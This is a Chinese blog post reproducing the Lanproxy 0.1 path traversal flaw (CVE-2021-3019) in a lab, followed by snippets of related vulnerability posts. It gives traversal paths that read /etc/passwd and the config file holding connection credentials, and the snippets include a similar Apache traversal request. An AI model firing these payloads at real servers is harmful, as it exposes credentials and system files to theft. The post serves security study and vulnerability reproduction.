局域网读取文件_Lanproxy 任意文件读取漏洞 (CVE20213019)复现

最新推荐文章于 2024-08-02 11:55:32 发布
最新推荐文章于 2024-08-02 11:55:32 发布
阅读量236 收藏
点赞数
文章标签: 局域网读取文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35703300/article/details/112670959
版权

漏洞概述

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

影响版本

lanproxy 0.1

环境搭建

下载proxy-server-0.1.zip

下载地址

https://file.nioee.com/d/2e81550ebdbd416c933f/

fb87db24f296259759a45db95a74f5d6.png

解压安装之后移动文件

mv proxy-server-0.1 /usr/local/

d59601bd7a152ca978dfcd934158fba2.png

接着启动服务

cd /usr/local/proxy-server-0.1/binchmod +x startup.sh./startup.sh

809d43d5564f441738b92f1a7fc3e31d.png

访问 http://host_ip:8090 ,即可看到登录界面。

f23c871054d3b2192a854dd8ad726dd8.png

漏洞复现

Poc

/../conf/config.properties

 62a78e7ae42f87d1d28049f8f3ee7775.png

接着我们在试试读取passwd

/../../../../../../../../../etc/passwd

a571290779ff389dc18735f28206a25b.png

成功读取

修复建议

升级到安全版本

陈书画
关注
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
内网穿透工具--lanproxy
******* ▄︻┻┳═一 *******
03-23 8538
一、简介 lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议,可用作访问内网网站、本地支付接口调试、SSH访问、远程桌面等等,而且带Web在线管理面板,添加端口配置十分简单。 二、相关链接 主页地址:https://nat.io2c.com/ Github地址:https://github.com/ffay/lanproxy https://gitee.com/fnw/lanproxy 发布包下载:https://seafile
目录遍历攻击详解
metheir的博客
01-08 8326
对于一个安全的Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
Lanproxy开箱即用的内网穿透工服务!!
最新发布
MAI44的博客
08-02 878
本文主要记录了使用Lanproxy搭建内网穿透服务的过程,其中包括服务端和客户端的详细配置,并且基于宝塔面板的Nginx实现域名绑定、反向代理与SSL等配置本地开发的项目,身在千里之外的朋友如何访问?通过本教程,这些问题都将得到解决。本教程将介绍如何搭建内网穿透服务(NAT穿透服务),将没有公网IP的主机映射至公网,实现任意地点访问内网的主机可以参考这种无需公网IP或者服务器支持的)
目录遍历攻击
大菜鸟的博客
02-11 2万+
原文地址:https://en.wikipedia.org/wiki/Directory_traversal_attack【译】目录遍历攻击一次目录遍历攻击(directory traversal attack)通常利用了“服务器安全认证缺失”或者“用户提供输入的文件处理操作”,使得服务器端文件操作接口执行了带有“遍历父文件目录”意图的恶意输入字符。 这种攻击的目的通常是利用服务器相关(存在安全漏
路径遍历与文件读取漏洞以及其修复方案
热门推荐
pygain的博客
10-17 3万+
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件
搭建lanproxy客户端与服务端实现内网穿透
qq_44821149的博客
06-08 1626
场景二: 公司在的数据库在云服务器上,但是为了安全着想,mysql的服务器没有公网ip,外网设备都不能直连mysql服务器。但是关了终端,再开个终端,再打印发现正常了,没有叠加。设置后端IP端口为: 10.xxx.xxx.xxx:3306 (这个是mysql云服务器在所在服务器集群的内网IP)腾讯云-总览-我的资源-云服务器-选择lanproxy服务端所在服务器-安全组-然后去添加所需开放的端口即可。后续就可以使用: 云服务器公网IP+设置的公网端口 来访问没有公网IP的mysql云服务器了。
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
Lanproxy 路径遍历漏洞 (CVE-2021-3019)
thelostworld
01-11 856
Lanproxy 路径遍历漏洞 (CVE-2021-3019) 一、漏洞简介 Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞(CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。 二、影响版本 lanproxy 0.1 三、漏洞...
Java防御目录穿越漏洞方法_Elasticsearch漏洞汇总
weixin_33467739的博客
03-01 1541
简介Elasticsearch是一个开源的分布式、RESTful 风格的搜索和数据分析引擎,它的底层是开源库Apache Lucene。Lucene 可以说是当下最先进、高性能、全功能的搜索引擎库——无论是开源还是私有,但它也仅仅只是一个库。为了充分发挥其功能,你需要使用 Java 并将 Lucene 直接集成到应用程序中。 更糟糕的是,您可能需要获得信息检索学位才能了解其工作原理,因为Lucen...
目录遍历漏洞
L_lemo004的博客
09-22 1811
文章目录目录遍历概念漏洞成因漏洞利用二、目录遍历漏洞第二种情况应用程序操作文件,限制不严时导致访问Web目录以外的文件,包括读写文件和远程执行代码特征测试方法绕过字符过滤利用DVWA进行漏洞测试利用远程文件包含漏洞代码执行权限配置不当引起的本地文件包含漏洞防御措施 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意文件(可以是web根目录以外的文件),甚至执行系统命令。
java 目录遍历漏洞_CVE-2006-5750 JBoss Java Class DeploymentFileRepository目录遍历漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安...
weixin_42511270的博客
02-26 459
|参考资料来源:BID名称:21219链接:http://www.securityfocus.com/bid/21219来源:REDHAT名称:RHSA-2006:0743链接:http://www.redhat.com/support/errata/RHSA-2006-0743.html来源:VUPEN名称:ADV-2006-4724链接:http://www.frsirt.com/englis...
Spring Boot 目录遍历 (CVE-2021_21234)
小小猪的博客
12-31 4569
Spring Boot 目录遍历 (CVE-2021_21234) 漏洞简介: spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端
Web 安全漏洞之目录遍历
GJ_ia的博客
01-14 575
第一次接触到目录遍历漏洞还是在 ThinkJS 2 的时候。代码如下图,目的是当用户访问的 URL 是静态资源的时候返回静态资源的地址。其中pathname就是用户访问的 URL 中的路径,我们发现代码中只是简单的解码之后就在22行将其与资源目录做了拼接,这就是非常明显的目录遍历漏洞了。为什么这么说呢?假设用户访问的 URL 是的话最终返回的文件地址就会变成的上三层目录中的文件了。
从0到1完全掌握目录遍历漏洞
hackzkaq的博客
04-07 301
零基础学黑客,搜索公众号:白帽子左一 什么是目录遍历漏洞 目录遍历漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露。 比如数据库备份文件、配置文件等,攻击者利用该信息可以为进一步入侵网站做准备。 简单来说,我个人认为目录遍历更像是一种 trick,是一种可以配合其他攻击一起使用的 trick,利用方法高于 CSRF 与 CORS。 早在最早接触的 dirb、御剑、Burpsuite 中的目录爆破工具,如果能扫出一些存在/存活的目录,其实就是目录遍历漏洞的一种。 总
CVE-2021-41773目录遍历(文件穿越)漏洞复现
qq_59826623的博客
10-11 1784
CVE-202141773目录遍历(文件穿越)漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值